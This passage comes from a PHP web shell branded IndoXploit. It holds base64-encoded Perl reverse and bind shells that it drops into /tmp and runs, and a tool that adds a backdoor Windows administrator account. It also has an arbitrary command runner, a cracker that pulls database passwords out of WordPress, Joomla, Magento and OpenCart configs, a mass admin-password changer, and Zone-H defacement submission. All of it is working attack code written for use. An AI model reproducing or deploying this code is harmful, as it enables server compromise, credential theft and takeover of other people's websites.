1079 $bc['code'] = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1080 save("/tmp/bc.pl", "w", base64_decode($bc['code']));
1081 $bc['exec'] = exe("perl /tmp/bc.pl ".$args[1]." ".$args[2]." 1>/dev/null 2>&1 &");
1082 sleep(1);
1083 print "<pre>".$bc['exec']."\n".exe("ps aux | grep bc.pl")."</pre>";
1084 @unlink("/tmp/bc.pl");
1085 }
1086 }
1087 elseif($args[0] === "bp") {
1088 if(empty($args[1])) die(color(1, 1, "Set Your PORT for Bind Port!"));
1089 if(empty($args[2])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
1090
1091 if($args[2] === "perl") {
1092 $bp['code'] = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1093 save("/tmp/bp.pl", "w", base64_decode($bp['code']));
1094 $bp['exec'] = exe("perl /tmp/bp.pl ".$args[1]." 1>/dev/null 2>&1 &");
1095 sleep(1);
1096 print "<pre>".$bp['exec']."\n".exe("ps aux | grep bp.pl")."</pre>";
1097 @unlink("/tmp/bp.pl");
1098 }
1099 }
1100 else {
1101 print color(1, 1, "Unknown '".$args[0]."'");
1102 }
1103 }
1104 elseif($toolsname === "krdp") {
1105 $args = explode(" ", $args);
1106
1107 if(OS() !== "Windows") die(color(1, 1, "Just For Windows Server"));
1108 if(preg_match("/indoxploit/", exe("net user"))) die(color(1, 1, "[INFO] username 'indoxploit' already exists."));
1109
1110 $add_user = exe("net user indoxploit indoxploit /add");
1111 $add_groups1 = exe("net localgroup Administrators indoxploit /add");
1112 $add_groups2 = exe("net localgroup Administrator indoxploit /add");
1113 $add_groups3 = exe("net localgroup Administrateur indoxploit /add");
1114
1115 print "[ RDP ACCOUNT INFO ]<br>
1116 ------------------------------<br>
1117 IP: ".color(1, 2, $GLOBALS['SERVERIP'])."<br>
1118 Username: ".color(1, 2, "indoxploit")."<br>
1119 Password: ".color(1, 2, "indoxploit")."<br>
1120 ------------------------------<br><br>
1121 [ STATUS ]<br>
1122 ------------------------------<br>
1123 ";
1124
1125 if($add_user) {
1126 print "[add user] -> ".color(1, 2, "SUCCESS")."<br>";
1127 }
1128 else {
1129 print "[add user] -> ".color(1, 1, "FAILED")."<br>";
1130 }
1131
1132 if($add_groups1) {
1133 print "[add localgroup Administrators] -> ".color(1, 2, "SUCCESS")."<br>";
1134 }
1135 elseif($add_groups2) {
1136 print "[add localgroup Administrator] -> ".color(1, 2, "SUCCESS")."<br>";
1137 }
1138 elseif($add_groups3) {
1139 print "[add localgroup Administrateur] -> ".color(1, 2, "SUCCESS")."<br>";
1140 }
1141 else {
1142 print "[add localgroup] -> ".color(1, 1, "FAILED")."<br>";
1143 }
1144
1145 print "------------------------------<br>";
1146 }
1147}
1148
1149function files_and_folder() {
1150 if(!is_dir(path())) die(color(1, 1, "Directory '".path()."' is not exists."));
1151 if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable."));
1152 print '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1153 <tr>
1154 <th class="th_home"><center>Name</center></th>
1155 <th class="th_home"><center>Type</center></th>
1156 <th class="th_home"><center>Size</center></th>
1157 <th class="th_home"><center>Last Modified</center></th>
1158 <th class="th_home"><center>Owner/Group</center></th>
1159 <th class="th_home"><center>Permission</center></th>
1160 <th class="th_home"><center>Action</center></th>
1161 </tr>';
1162
1163 if(function_exists('opendir')) {
1164 if($opendir = opendir(path())) {
1165 while(($readdir = readdir($opendir)) !== false) {
1166 $dir[] = $readdir;
1167 }
1168 closedir($opendir);
1169 }
1170 sort($dir);
1171 } else {
1172 $dir = scandir(path());
1173 }
1174
1175 foreach($dir as $folder) {
1176 $dirinfo['path'] = path().DIRECTORY_SEPARATOR.$folder;
1177 if(!is_dir($dirinfo['path'])) continue;
1178 $dirinfo['type'] = filetype($dirinfo['path']);
1179 $dirinfo['time'] = date("F d Y g:i:s", filemtime($dirinfo['path']));
1180 $dirinfo['size'] = "-";
1181 $dirinfo['perms'] = writeable($dirinfo['path'], perms($dirinfo['path']));
1182 $dirinfo['link'] = ($folder === ".." ? "<a href='?dir=".dirname(path())."'>$folder</a>" : ($folder === "." ? "<a href='?dir=".path()."'>$folder</a>" : "<a href='?dir=".$dirinfo['path']."'>$folder</a>"));
1183 $dirinfo['action']= ($folder === '.' || $folder === '..') ? "<a href='?act=newfile&dir=".path()."'>newfile</a> | <a href='?act=newfolder&dir=".path()."'>newfolder</a>" : "<a href='?act=rename_folder&dir=".$dirinfo['path']."'>rename</a> | <a href='?act=delete_folder&dir=".$dirinfo['path']."'>delete</a>";
1184 if(function_exists('posix_getpwuid')) {
1185 $dirinfo['owner'] = (object) @posix_getpwuid(fileowner($dirinfo['path']));
1186 $dirinfo['owner'] = $dirinfo['owner']->name;
1187 } else {
1188 $dirinfo['owner'] = fileowner($dirinfo['path']);
1189 }
1190 if(function_exists('posix_getgrgid')) {
1191 $dirinfo['group'] = (object) @posix_getgrgid(filegroup($dirinfo['path']));
1192 $dirinfo['group'] = $dirinfo['group']->name;
1193 } else {
1194 $dirinfo['group'] = filegroup($dirinfo['path']);
1195 }
1196 print "<tr>";
1197 print "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>".$dirinfo['link']."</td>";
1198 print "<td class='td_home' style='text-align: center;'>".$dirinfo['type']."</td>";
1199 print "<td class='td_home' style='text-align: center;'>".$dirinfo['size']."</td>";
1200 print "<td class='td_home' style='text-align: center;'>".$dirinfo['time']."</td>";
1201 print "<td class='td_home' style='text-align: center;'>".$dirinfo['owner'].DIRECTORY_SEPARATOR.$dirinfo['group']."</td>";
1202 print "<td class='td_home' style='text-align: center;'>".$dirinfo['perms']."</td>";
1203 print "<td class='td_home' style='padding-left: 15px;'>".$dirinfo['action']."</td>";
1204 print "</tr>";
1205 }
1206 foreach($dir as $files) {
1207 $fileinfo['path'] = path().DIRECTORY_SEPARATOR.$files;
1208 if(!is_file($fileinfo['path'])) continue;
1209 $fileinfo['type'] = filetype($fileinfo['path']);
1210 $fileinfo['time'] = date("F d Y g:i:s", filemtime($fileinfo['path']));
1211 $fileinfo['size'] = filesize($fileinfo['path'])/1024;
1212 $fileinfo['size'] = round($fileinfo['size'],3);
1213 $fileinfo['size'] = ($fileinfo['size'] > 1024) ? round($fileinfo['size']/1024,2). "MB" : $fileinfo['size']. "KB";
1214 $fileinfo['perms']= writeable($fileinfo['path'], perms($fileinfo['path']));
1215 if(function_exists('posix_getpwuid')) {
1216 $fileinfo['owner'] = (object) @posix_getpwuid(fileowner($fileinfo['path']));
1217 $fileinfo['owner'] = $fileinfo['owner']->name;
1218 } else {
1219 $fileinfo['owner'] = fileowner($fileinfo['path']);
1220 }
1221 if(function_exists('posix_getgrgid')) {
1222 $fileinfo['group'] = (object) @posix_getgrgid(filegroup($fileinfo['path']));
1223 $fileinfo['group'] = $fileinfo['group']->name;
1224 } else {
1225 $fileinfo['group'] = filegroup($fileinfo['path']);
1226 }
1227 print "<tr>";
1228 print "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=".path()."&file=".$fileinfo['path']."'>$files</a></td>";
1229 print "<td class='td_home' style='text-align: center;'>".$fileinfo['type']."</td>";
1230 print "<td class='td_home' style='text-align: center;'>".$fileinfo['size']."</td>";
1231 print "<td class='td_home' style='text-align: center;'>".$fileinfo['time']."</td>";
1232 print "<td class='td_home' style='text-align: center;'>".$fileinfo['owner'].DIRECTORY_SEPARATOR.$fileinfo['group']."</td>";
1233 print "<td class='td_home' style='text-align: center;'>".$fileinfo['perms']."</td>";
1234 print "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=".path()."&file=".$fileinfo['path']."'>edit</a> | <a href='?act=rename&dir=".path()."&file=".$fileinfo['path']."'>rename</a> | <a href='?act=delete&dir=".path()."&file=".$fileinfo['path']."'>delete</a> | <a href='?act=download&dir=".path()."&file=".$fileinfo['path']."'>download</a></td>";
1235 print "</tr>";
1236 }
1237
1238 print "</table>";
1239 print "<center>Copyright © ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'>".color(1, 2, "IndoXploit")."</a></center>";
1240}
1241
1242
1243function action() {
1244 tools("upload");
1245 tools("cmd");
1246 print "<hr style='margin-top: 15px; margin-bottom: 10px;'>";
1247 print "<center>";
1248 print "<ul>";
1249 print "<li>[ <a href='?'>Home</a> ]</li>";
1250 print "<li>[ <a href='?dir=".path()."&do=fakeroot'>Fake Root</a> ]</li>";
1251 print "<li>[ <a href='?dir=".path()."&do=cpanel'>cPanel Crack</a> ]</li>";
1252 print "<li>[ <a href='?dir=".path()."&do=mpc'>Mass Password Change</a> ]</li>";
1253 print "<li>[ <a href='?dir=".path()."&do=mass'>Mass Deface/Delete</a> ]</li>";
1254 print "<li>[ <a href='?dir=".path()."&do=lre'>Local Root Exploiter</a> ]</li>";
1255 print "<li>[ <a href='?dir=".path()."&do=zoneh'>Zone-H</a> ]</li>";
1256 print "</ul>";
1257 print "</center>";
1258 print "<hr style='margin-top: 15px; margin-bottom: 10px;'>";
1259
1260
1261 if(isset($_GET['do'])) {
1262 if($_GET['do'] === "cmd") {
1263 if(isset($_POST['cmd'])) {
1264 if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) {
1265 tools("readfile", $match[1]);
1266 }
1267 elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) {
1268 tools("spawn", $match[1]);
1269 }
1270 elseif(preg_match("/^symlink$/", $_POST['cmd'], $match)) {
1271 tools("symlink");
1272 }
1273 elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) {
1274 tools("network", $match[1]);
1275 }
1276 elseif(preg_match("/^krdp$/", $_POST['cmd'])) {
1277 tools("krdp");
1278 }
1279 elseif(preg_match("/^jumping$/", $_POST['cmd'])) {
1280 tools("jumping");
1281 }
1282 elseif(preg_match("/^idxconfig$/", $_POST['cmd'])) {
1283 tools("idxconfig");
1284 }
1285 elseif(preg_match("/^logout$/", $_POST['cmd'])) {
1286 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1287 print "<script>window.location='?';</script>";
1288 }
1289 elseif(preg_match("/^killme$/", $_POST['cmd'])) {
1290 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1291 @unlink(__FILE__);
1292 print "<script>window.location='?';</script>";
1293 }
1294 else {
1295 print "<pre>".exe($_POST['cmd'])."</pre>";
1296 }
1297 }
1298 else {
1299 files_and_folder();
1300 }
1301 }
1302 elseif($_GET['do'] === "zoneh") {
1303 if(isset($_POST['submit']) AND $_GET['do'] === "zoneh") {
1304 $nick = $_POST['nick'];
1305 $domain = explode("\r\n", $_POST['url']);
1306
1307 print "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1308 print "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1309
1310 foreach($domain as $no => $url) {
1311 $no = ($no+1).".";
1312 $post = curl("http://www.zone-h.org/notify/single", TRUE, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1313 if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $post)) {
1314 print "$no $url -> ".color(1, 2, "OK")."<br>";
1315 } else {
1316 print "$no $url -> ".color(1, 1, "ERROR")."<br>";
1317 }
1318 }
1319 }
1320 else {
1321 print "<center><form method='post' action='?do=zoneh&dir=".path()."'>
1322 Defacer: <br>
1323 <input type='text' name='nick' size='50' value='IndoXploit'><br><br>
1324 Domains: <br>
1325 <textarea style='width: 450px; height: 150px;' name='url' placeholder='http://google.com/'></textarea><br>
1326 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='submit' value='Submit'>
1327 </form></center>";
1328 }
1329 }
1330 elseif($_GET['do'] == 'cpanel') {
1331 if($_POST['crack']) {
1332 $usercp = explode("\r\n", $_POST['user_cp']);
1333 $passcp = explode("\r\n", $_POST['pass_cp']);
1334 $i = 0;
1335 foreach($usercp as $ucp) {
1336 foreach($passcp as $pcp) {
1337 $connect = mysql_connect('localhost', $ucp, $pcp);
1338 if($connect) {
1339 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1340 } else {
1341 $_SESSION[$ucp] = "1";
1342 $_SESSION[$pcp] = "1";
1343 if($ucp === '' || $pcp === '') {
1344 //
1345 } else {
1346 $i++;
1347 print "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain (";
1348 if(!function_exists('posix_getpwuid')) print color(1, 1, "Function is Disable by System!");
1349 if(!getdomainname()) print color(1, 1, "Can't get domain name");
1350 foreach(getdomainname() as $domain) {
1351 $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
1352 $userdomain = $userdomain->name;
1353 if($userdomain === $user) {
1354 print "<a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
1355 break;
1356 }
1357 }
1358 print (empty($domain)) ? color(1, 1, "Can't get domain name.") : color(1, 2, $domain);
1359 print ")<br>";
1360 }
1361 }
1362 mysql_close($connect);
1363 }
1364 }
1365 }
1366 print ($i === 0) ? "" : "<p>".color(1, 3, "Sukses nyolong $i Cpanel by IndoXploit")."</p>";
1367 } else {
1368 print "<center>
1369 <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1370 <form method='post'>
1371 USER: <br>
1372 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1373 print implode("\n", getuser());
1374 print "</textarea><br>
1375 PASS: <br>
1376 <span>Grab Password from Link Config:</span><br>
1377 <input style='width: 425px; background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='text' name='linkpass' placeholder='http://web.com/idx_config/'>
1378 <input style='background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='submit' name='submitlink' value='>>'>
1379 <br>
1380 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1381
1382 if(isset($_POST['submitlink'])) {
1383 $getpass = $_POST['linkpass'];
1384 $get = curl($_POST['linkpass']);
1385 preg_match_all('/<a href="(.*?).txt">/', $get, $link);
1386 foreach($link[1] as $link_config) {
1387 $scandir[] = "$link_config.txt";
1388 }
1389 }
1390 else {
1391 $getpass = path();
1392 $scandir = scandir($getpass);
1393 }
1394
1395 $password = "";
1396
1397 foreach($scandir as $files) {
1398 $file = "$getpass/$files";
1399 $config = file_get_contents($file);
1400 if(preg_match("/WordPress/", $config)) {
1401 $password .= getValue($config, "DB_PASSWORD', '", "'")."\n";
1402 }
1403 elseif(preg_match("/JConfig|joomla/", $config)) {
1404 $password .= getValue($config, "password = '", "'")."\n";
1405 }
1406 elseif(preg_match("/Magento|Mage_Core/", $config)) {
1407 $password .= getValue($config, "<password><![CDATA[", "]]></password>")."\n";
1408 }
1409 elseif(preg_match("/panggil fungsi validasi xss dan injection/", $config)) {
1410 $password .= getValue($config, 'password = "', '"')."\n";
1411 }
1412 elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) {
1413 $password .= getValue($config, "'DB_PASSWORD', '", "'")."\n";
1414 }
1415 elseif(preg_match("/^[client]$/", $config)) {
1416 preg_match("/password=(.*?)/", $config, $pass);
1417 if(preg_match('/"/', $pass[1])) {
1418 $pass[1] = str_replace('"', "", $pass[1]);
1419 $password .= $pass[1]."\n";
1420 }
1421 else {
1422 $password .= $pass[1]."\n";
1423 }
1424 }
1425 elseif(preg_match("/cc_encryption_hash/", $config)) {
1426 $password .= getValue($config, "db_password = '", "'")."\n";
1427 }
1428 }
1429
1430 print $password;
1431
1432 print "</textarea><br>
1433 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='crack' value='Crack'>
1434 </form></center>";
1435 }
1436 }
1437 elseif($_GET['do'] == 'mpc') {
1438 if($_POST['hajar']) {
1439 if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1440 print "username atau password harus lebih dari 6 karakter";
1441 }
1442 else {
1443 $user_baru = $_POST['user_baru'];
1444 $pass_baru = md5($_POST['pass_baru']);
1445 $conf = $_POST['config_dir'];
1446
1447 if(preg_match("/^http:\/\//", $conf) OR preg_match("/^https:\/\//", $conf)) {
1448 $get = curl($conf);
1449 preg_match_all('/<a href="(.*?).txt">/', $get, $link);
1450 foreach($link[1] as $link_config) {
1451 $scan_conf[] = "$link_config.txt";
1452 }
1453 }
1454 else {
1455 $scan_conf = scandir($conf);
1456 }
1457
1458 foreach($scan_conf as $file_conf) {
1459 $config = file_get_contents("$conf/$file_conf");
1460 if(preg_match("/JConfig|joomla/",$config)) {
1461 $dbhost = getValue($config,"host = '","'");
1462 $dbuser = getValue($config,"user = '","'");
1463 $dbpass = getValue($config,"password = '","'");
1464 $dbname = getValue($config,"db = '","'");
1465 $dbprefix = getValue($config,"dbprefix = '","'");
1466 $prefix = $dbprefix."users";
1467 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1468 $db = mysql_select_db($dbname);
1469 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1470 $result = mysql_fetch_array($q);
1471 $id = $result['id'];
1472 $site = getValue($config,"sitename = '","'");
1473 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1474 print "Config => ".$file_conf."<br>";
1475 print "CMS => Joomla<br>";
1476 if($site == '') {
1477 print "Sitename => ".color(1, 1, "Can't get domain name")."<br>";
1478 }
1479 else {
1480 print "Sitename => $site<br>";
1481 }
1482 if(!$update OR !$conn OR !$db) {
1483 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1484 }
1485 else {
1486 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1487 }
1488 mysql_close($conn);
1489 } elseif(preg_match("/WordPress/",$config)) {
1490 $dbhost = getValue($config,"DB_HOST', '","'");
1491 $dbuser = getValue($config,"DB_USER', '","'");
1492 $dbpass = getValue($config,"DB_PASSWORD', '","'");
1493 $dbname = getValue($config,"DB_NAME', '","'");
1494 $dbprefix = getValue($config,"table_prefix = '","'");
1495 $prefix = $dbprefix."users";
1496 $option = $dbprefix."options";
1497 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1498 $db = mysql_select_db($dbname);
1499 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1500 $result = mysql_fetch_array($q);
1501 $id = $result[ID];
1502 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1503 $result2 = mysql_fetch_array($q2);
1504 $target = $result2[option_value];
1505 if($target == '') {
1506 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1507 }
1508 else {
1509 $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1510 }
1511 $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1512 print "Config => ".$file_conf."<br>";
1513 print "CMS => Wordpress<br>";
1514 print $url_target;
1515 if(!$update OR !$conn OR !$db) {
1516 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1517 }
1518 else {
1519 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1520 }
1521 mysql_close($conn);
1522 }
1523 elseif(preg_match("/Magento|Mage_Core/",$config)) {
1524 $dbhost = getValue($config,"<host><![CDATA[","]]></host>");
1525 $dbuser = getValue($config,"<username><![CDATA[","]]></username>");
1526 $dbpass = getValue($config,"<password><![CDATA[","]]></password>");
1527 $dbname = getValue($config,"<dbname><![CDATA[","]]></dbname>");
1528 $dbprefix = getValue($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1529 $prefix = $dbprefix."admin_user";
1530 $option = $dbprefix."core_config_data";
1531 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1532 $db = mysql_select_db($dbname);
1533 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1534 $result = mysql_fetch_array($q);
1535 $id = $result[user_id];
1536 $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1537 $result2 = mysql_fetch_array($q2);
1538 $target = $result2[value];
1539 if($target == '') {
1540 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1541 }
1542 else {
1543 $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1544 }
1545 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1546 print "Config => ".$file_conf."<br>";
1547 print "CMS => Magento<br>";
1548 print $url_target;
1549 if(!$update OR !$conn OR !$db) {
1550 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1551 }
1552 else {
1553 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1554 }
1555 mysql_close($conn);
1556 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1557 $dbhost = getValue($config,"'DB_HOSTNAME', '","'");
1558 $dbuser = getValue($config,"'DB_USERNAME', '","'");
1559 $dbpass = getValue($config,"'DB_PASSWORD', '","'");
1560 $dbname = getValue($config,"'DB_DATABASE', '","'");
1561 $dbprefix = getValue($config,"'DB_PREFIX', '","'");
1562 $prefix = $dbprefix."user";
1563 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1564 $db = mysql_select_db($dbname);
1565 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1566 $result = mysql_fetch_array($q);
1567 $id = $result[user_id];
1568 $target = getValue($config,"HTTP_SERVER', '","'");
1569 if($target == '') {
1570 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1571 }
1572 else {
1573 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1574 }
1575 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1576 print "Config => ".$file_conf."<br>";
1577 print "CMS => OpenCart<br>";
1578 print $url_target;
1579 if(!$update OR !$conn OR !$db) {
1580 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1581 }
1582 else {
1583 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1584 }
1585 mysql_close($conn);
1586 }
1587 elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1588 $dbhost = getValue($config,'server = "','"');
1589 $dbuser = getValue($config,'username = "','"');
1590 $dbpass = getValue($config,'password = "','"');
1591 $dbname = getValue($config,'database = "','"');
1592 $prefix = "users";
1593 $option = "identitas";
1594 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1595 $db = mysql_select_db($dbname);
1596 $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1597 $result = mysql_fetch_array($q);
1598 $target = $result[alamat_website];
1599 if($target == '') {
1600 $target2 = $result[url];
1601 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1602 if($target2 == '') {
1603 $url_target2 = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1604 }
1605 else {
1606 $cek_login3 = file_get_contents("$target2/adminweb/");
1607 $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1608 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1609 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1610 }
1611 elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1612 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1613 }
1614 else {
1615 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1616 }
1617 }
1618 } else {
1619 $cek_login = file_get_contents("$target/adminweb/");
1620 $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1621 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1622 $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1623 }
1624 elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1625 $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1626 }
1627 else {
1628 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1629 }
1630 }
1631 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1632 print "Config => ".$file_conf."<br>";
1633 print "CMS => Lokomedia<br>";
1634 if(preg_match("/Can't get domain name/", $url_target)) {
1635 print $url_target2;
1636 }
1637 else {
1638 print $url_target;
1639 }
1640 if(!$update OR !$conn OR !$db) {
1641 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1642 }
1643 else {
